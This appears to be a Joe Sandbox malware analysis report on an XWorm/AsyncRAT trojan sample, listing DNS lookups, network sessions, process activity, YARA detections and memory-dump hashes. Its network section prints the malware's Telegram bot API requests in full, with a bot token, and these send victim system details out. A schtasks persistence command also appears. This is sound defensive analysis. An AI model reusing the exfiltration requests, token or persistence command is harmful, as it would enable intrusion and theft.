                                                                                                                                                                              Feb 6, 2024 09:37:23.947185993 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.947273016 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.963238001 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.968255997 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.989578009 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.150201082 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.166265011 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.175276041 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.175857067 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.210484028 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.384871006 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.384943008 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.417543888 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.443880081 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.447432041 CET4983422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.591826916 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.650764942 CET2210049833167.71.56.116192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 6, 2024 09:33:26.793662071 CET | 192.168.2.9 | 1.1.1.1 | 0x41bb | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:33:27.982332945 CET | 192.168.2.9 | 1.1.1.1 | 0xf2ba | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:34:08.804172993 CET | 192.168.2.9 | 1.1.1.1 | 0xccf0 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:34:41.040900946 CET | 192.168.2.9 | 1.1.1.1 | 0xa3d0 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:35:11.273876905 CET | 192.168.2.9 | 1.1.1.1 | 0x32e9 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:36:06.174799919 CET | 192.168.2.9 | 1.1.1.1 | 0xc776 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:36:11.480329037 CET | 192.168.2.9 | 1.1.1.1 | 0x60fb | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:36:35.960139990 CET | 192.168.2.9 | 1.1.1.1 | 0x8fbe | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:37:24.884151936 CET | 192.168.2.9 | 1.1.1.1 | 0x6556 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 6, 2024 09:33:26.911106110 CET | 1.1.1.1 | 192.168.2.9 | 0x41bb | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:33:28.158396959 CET | 1.1.1.1 | 192.168.2.9 | 0xf2ba | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:33:28.158396959 CET | 1.1.1.1 | 192.168.2.9 | 0xf2ba | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:34:08.985332966 CET | 1.1.1.1 | 192.168.2.9 | 0xccf0 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:34:08.985332966 CET | 1.1.1.1 | 192.168.2.9 | 0xccf0 | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:34:41.220263004 CET | 1.1.1.1 | 192.168.2.9 | 0xa3d0 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:34:41.220263004 CET | 1.1.1.1 | 192.168.2.9 | 0xa3d0 | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:35:11.432729006 CET | 1.1.1.1 | 192.168.2.9 | 0x32e9 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:35:11.432729006 CET | 1.1.1.1 | 192.168.2.9 | 0x32e9 | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:36:06.292565107 CET | 1.1.1.1 | 192.168.2.9 | 0xc776 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:36:11.867438078 CET | 1.1.1.1 | 192.168.2.9 | 0x60fb | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:36:11.867438078 CET | 1.1.1.1 | 192.168.2.9 | 0x60fb | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:36:36.116210938 CET | 1.1.1.1 | 192.168.2.9 | 0x8fbe | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:36:36.116210938 CET | 1.1.1.1 | 192.168.2.9 | 0x8fbe | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 6, 2024 09:37:25.042890072 CET | 1.1.1.1 | 192.168.2.9 | 0x6556 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2024 09:37:25.042890072 CET | 1.1.1.1 | 192.168.2.9 | 0x6556 | No error (0) | eu-central-7075.packetriot.net | | 167.71.56.116 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                              • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49705 | 149.154.167.220 | 443 | 3280 | C:\Users\user\AppData\Roaming\X.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-06 08:33:27 UTC | 447 | OUT | GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Connection: Keep-Alive
2024-02-06 08:33:27 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Tue, 06 Feb 2024 08:33:27 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 452
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-06 08:33:27 UTC | 452 | IN | Data Ascii: {"ok":true,"result":{"message_id":3131,"from":{"id":6731733957,"is_bot":true,"first_name":"i really hate this","username":"ireallyhatethisbot"},"chat":{"id":2031060627,"first_name":"Lukky","username":"Lukky053","type":"private"},"date":1707208407,"text":"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49784 | 149.154.167.220 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-02-06 08:36:06 UTC | 447 | OUT | GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Connection: Keep-Alive
2024-02-06 08:36:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Tue, 06 Feb 2024 08:36:07 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 452
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-06 08:36:07 UTC | 452 | IN | Data Ascii: {"ok":true,"result":{"message_id":3134,"from":{"id":6731733957,"is_bot":true,"first_name":"i really hate this","username":"ireallyhatethisbot"},"chat":{"id":2031060627,"first_name":"Lukky","username":"Lukky053","type":"private"},"date":1707208567,"text":"



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:09:33:19
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              Imagebase:0x7f0000
                                                                                                                                                                              File size:2'324'480 bytes
                                                                                                                                                                              MD5 hash:8DCBB40394210DC5287028E66FDBF0C7
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:09:33:20
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\X.exe"
                                                                                                                                                                              Imagebase:0x960000
                                                                                                                                                                              File size:36'864 bytes
                                                                                                                                                                              MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 82%, ReversingLabs
                                                                                                                                                                              • Detection: 77%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:09:33:20
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\61c7cdb3196df.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\61c7cdb3196df.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'907'200 bytes
                                                                                                                                                                              MD5 hash:C0E5B07CBF2D02C54F39CE6AAD676DC7
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 11%, ReversingLabs
                                                                                                                                                                              • Detection: 10%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:09:33:24
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                              Imagebase:0x7ff6c27f0000
                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:09:33:24
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:09:35:34
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                              Imagebase:0x7ff77afe0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:09:35:35
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                                                                                                                                                                              Imagebase:0x7ff6d9200000
                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:09:35:35
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732
                                                                                                                                                                              Imagebase:0x7ff6d9200000
                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:09:35:38
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                              Imagebase:0x7ff77afe0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: c076f8df8a2c5ffa4253d25ef488bc5e7c87abe41589df16d2476ae825677684
                                                                                                                                                                                • Instruction ID: 9994d09b8fbd4ce435c42658fc5206af19d1aa72c0cb80c7a2ea467f73f1173d
                                                                                                                                                                                • Opcode Fuzzy Hash: c076f8df8a2c5ffa4253d25ef488bc5e7c87abe41589df16d2476ae825677684
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C31786288E3C25FC7035B749C664A57FB0AE47260B0E40DBD8C4CB4E3D61C699AC762
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1270d3e36d8c29ea479f1b245abc392411bd8c3b272e6aacb555fc0bd5e69550
                                                                                                                                                                                • Instruction ID: 710dbb813ff2db29ab43cc1b09d836b623e3b80b4e074a353914d3f976dceb12
                                                                                                                                                                                • Opcode Fuzzy Hash: 1270d3e36d8c29ea479f1b245abc392411bd8c3b272e6aacb555fc0bd5e69550
                                                                                                                                                                                • Instruction Fuzzy Hash: 20318121E0DAC94FEB85AB6858696B87BE2FF5A751F0800BBD44DC71D3DE289845C702
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (0#$8,#$H1#$P/#$k^]I$-#
                                                                                                                                                                                • API String ID: 0-2702928345
                                                                                                                                                                                • Opcode ID: cee0d7c5a55065d6554d7bb7278d0c76fbba1c93a1fab6de817c7ee06f47c809
                                                                                                                                                                                • Instruction ID: 777f2dfff88619080e0787a00615e56421ca25deaed1977f269d6c837cdb0fcf
                                                                                                                                                                                • Opcode Fuzzy Hash: cee0d7c5a55065d6554d7bb7278d0c76fbba1c93a1fab6de817c7ee06f47c809
                                                                                                                                                                                • Instruction Fuzzy Hash: 6541EAA3D0EAC28FE6564D6638071756AA2FF11F90F6880FFC04C470DBE965AA19D346
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: SAN_^
                                                                                                                                                                                • API String ID: 0-3629432999
                                                                                                                                                                                • Opcode ID: e3fa3350546a84eeb99500bbd03de5104b3e70bc47b7979e2d5d50569c103939
                                                                                                                                                                                • Instruction ID: 87b54649a1e425b27cee3798c39d93fbbbb829800e3e198028cca09d3d493993
                                                                                                                                                                                • Opcode Fuzzy Hash: e3fa3350546a84eeb99500bbd03de5104b3e70bc47b7979e2d5d50569c103939
                                                                                                                                                                                • Instruction Fuzzy Hash: 11328171B18A494BEB98EB6894657BDB7D2FF88780F544579E40EC32D3DE3CA8018742
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 483b8a2ae917036d1b8a5468ac6f68a9f6eeaa7d3183138606f40ea29bf1fa6d
                                                                                                                                                                                • Instruction ID: d96a8e3581d338d106a139b68937dd4de56b584dc734a2d7b8b2b7d80f0ad703
                                                                                                                                                                                • Opcode Fuzzy Hash: 483b8a2ae917036d1b8a5468ac6f68a9f6eeaa7d3183138606f40ea29bf1fa6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 45512320A0D6C50FD786ABB858642B5BFD1EF87256F0841FAE08DC71D3DE1C4846C346
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0?#
                                                                                                                                                                                • API String ID: 0-1350394706
                                                                                                                                                                                • Opcode ID: 24f5489a29ba046ea2336558bc87c82d917cbe3827138ab95bd733a0e68b500c
                                                                                                                                                                                • Instruction ID: 90e94199a6c889e5c981d41e89b9ffc319dba5b1fc6d51dcb16f01c0c7d03945
                                                                                                                                                                                • Opcode Fuzzy Hash: 24f5489a29ba046ea2336558bc87c82d917cbe3827138ab95bd733a0e68b500c
                                                                                                                                                                                • Instruction Fuzzy Hash: E861BF31A1CA484FDB98EB6898997B977E1FF58350F54417AE40ED32D2CE38AC41CB41
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: 08eaf92f8bb21e708a8ca5a184ccaa269943e0bf9437e0d2cc896a21d8fb31cc
                                                                                                                                                                                • Instruction ID: 9a65dddfad6137b6e907be5a8a3efffd14749d74c98b1027d52fab7ba6cc2b28
                                                                                                                                                                                • Opcode Fuzzy Hash: 08eaf92f8bb21e708a8ca5a184ccaa269943e0bf9437e0d2cc896a21d8fb31cc
                                                                                                                                                                                • Instruction Fuzzy Hash: ACC17360B289494BEB54BBACD8657BDB3D2EF98780F540176E41DC72D7CE2C6C428742
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: 01b1af5ef8d25855df777b95425849bfea018fd3e9c0fc08c0e451aa43679ac9
                                                                                                                                                                                • Instruction ID: 2ffc4e828363212961b11c3e2814458feaa8af509f0302dc4ae551fa4e1c0eaf
                                                                                                                                                                                • Opcode Fuzzy Hash: 01b1af5ef8d25855df777b95425849bfea018fd3e9c0fc08c0e451aa43679ac9
                                                                                                                                                                                • Instruction Fuzzy Hash: 61B18620B289194BEA94FBACD8667BDB2D2FF98780F540175E41DC72D7CD2CAC428742
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: cfc10a78cfc706feae2294f99358e97b563e53058e137a85839048b920265e21
                                                                                                                                                                                • Instruction ID: 9696305aa9f167bce52f60258645734c4184fdeaa674fe7047f67ee8c743b7c4
                                                                                                                                                                                • Opcode Fuzzy Hash: cfc10a78cfc706feae2294f99358e97b563e53058e137a85839048b920265e21
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FA15560B189094BFA54BBACD8567BDB2D2EF98740F644275E10DC72D7CD6CAC028793
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
